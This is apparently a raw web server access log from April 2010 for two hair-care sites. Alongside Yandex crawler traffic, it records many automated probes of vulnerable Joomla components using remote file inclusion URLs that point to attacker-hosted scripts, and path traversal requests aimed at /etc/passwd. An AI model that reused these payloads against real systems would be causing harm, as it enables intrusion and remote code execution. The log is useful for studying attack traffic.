77.88.25.28 - - [26/Apr/2010:05:19:43 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13834 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.244.236.248 - - [26/Apr/2010:05:20:20 -0700] "GET /logs/access_100419.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:21:48 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:05:21:49 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:05:21:49 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:05:21:49 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.244.236.248 - - [26/Apr/2010:05:22:56 -0700] "GET /logs/access_100419.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:23:24 -0700] "GET /logs/access_100419.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:27:06 -0700] "GET /logs/access_100405.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:27:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13340 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.244.236.248 - - [26/Apr/2010:05:29:48 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:29:53 -0700] "GET /logs/access_100322.log HTTP/1.1" 200 2573876 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:30:36 -0700] "GET /logs/access_100405.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:30:37 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:30:51 -0700] "GET /logs/access_100405.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:30:55 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:31:42 -0700] "GET /logs/access_100405.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:31:42 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:05:33:45 -0700] "GET /administrator/components/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.219.11.2 - - [26/Apr/2010:05:33:45 -0700] "GET /logs/access.log//administrator/components/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.219.11.2 - - [26/Apr/2010:05:33:45 -0700] "GET /logs//administrator/components/com_sef/admin.sef.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:05:33:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7667 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.208.91.30 - - [26/Apr/2010:05:39:04 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.208.91.30 - - [26/Apr/2010:05:39:04 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.208.91.30 - - [26/Apr/2010:05:39:05 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:05:39:07 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.214.22.142 - - [26/Apr/2010:05:40:43 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.manolashandmadesoaps.com/alexharden/wp-content/uploads/2010/04/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.22.142 - - [26/Apr/2010:05:40:43 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.manolashandmadesoaps.com/alexharden/wp-content/uploads/2010/04/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.214.22.142 - - [26/Apr/2010:05:40:43 -0700] "GET /logs/access_100412.log%20%20//components/com_flyspray/startdown.php?file=http://www.manolashandmadesoaps.com/alexharden/wp-content/uploads/2010/04/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:41:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14581 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.208.91.30 - - [26/Apr/2010:05:42:29 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:43:06 -0700] "GET /com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:44:35 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 1004971 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:05:45:18 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:05:45:18 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:05:45:18 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:05:46:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:05:46:29 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:05:46:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:48:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14057 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
92.240.42.10 - - [26/Apr/2010:05:48:46 -0700] "GET /logs/access.log//index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.240.42.10 - - [26/Apr/2010:05:48:47 -0700] "GET /index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
92.240.42.10 - - [26/Apr/2010:05:48:47 -0700] "GET /logs//index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.208.91.30 - - [26/Apr/2010:05:50:52 -0700] "GET /logs/access_100419.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:05:50:57 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:05:50:58 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:05:50:59 -0700] "GET /logs/access_100405.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:05:51:21 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:05:51:21 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:05:51:23 -0700] "GET /logs/access_100405.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:05:51:38 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:05:52:02 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:05:53:14 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:53:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15157 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
92.240.42.10 - - [26/Apr/2010:05:55:10 -0700] "GET /logs/access_100412.log//com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:55:10 -0700] "GET /com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:55:11 -0700] "GET /logs//com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.208.91.30 - - [26/Apr/2010:05:55:44 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hhse.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:57:11 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 793223 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:59:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3303 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:06:06:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15367 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:06:07:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:06:07:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:06:07:49 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:12:14 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 3322730 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:06:13:25 -0700] "GET /logs/access_100125.log/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:06:13:26 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:06:13:26 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:14:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12967 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:06:15:17 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:06:15:17 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:06:15:17 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:06:15:36 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:06:20:18 -0700] "GET /classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:06:20:18 -0700] "GET /logs//classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:06:20:18 -0700] "GET /logs/access_100412.log//classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:21:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14270 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:06:22:42 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:26:47 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 1294739 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:28:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3327 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
62.219.11.2 - - [26/Apr/2010:06:29:15 -0700] "GET /logs/components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:29:15 -0700] "GET /logs/access_100419.log%20%20/components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:29:15 -0700] "GET /components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:29:15 -0700] "GET /logs/components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:29:15 -0700] "GET /components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:29:15 -0700] "GET /logs/access_100419.log/components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:31:11 -0700] "GET /components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:31:12 -0700] "GET /logs/access_100419.log/components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:31:12 -0700] "GET /logs/components/com_rssfactory/pseudorefresh.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:32:28 -0700] "GET /components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:32:28 -0700] "GET /logs//components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:32:28 -0700] "GET /logs/access_100419.log%20%20//components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:32:29 -0700] "GET /components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:32:29 -0700] "GET /logs//components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:32:30 -0700] "GET /logs/access_100419.log//components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:33:31 -0700] "GET /components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:33:31 -0700] "GET /logs//components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:33:31 -0700] "GET /logs/access_100419.log%20%20//components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:33:34 -0700] "GET /components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:33:34 -0700] "GET /logs/access_100419.log//components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:33:34 -0700] "GET /logs//components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:34:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14137 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.59.48.68 - - [26/Apr/2010:06:39:06 -0700] "GET /logs/access_100405.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:06:39:06 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:06:39:07 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
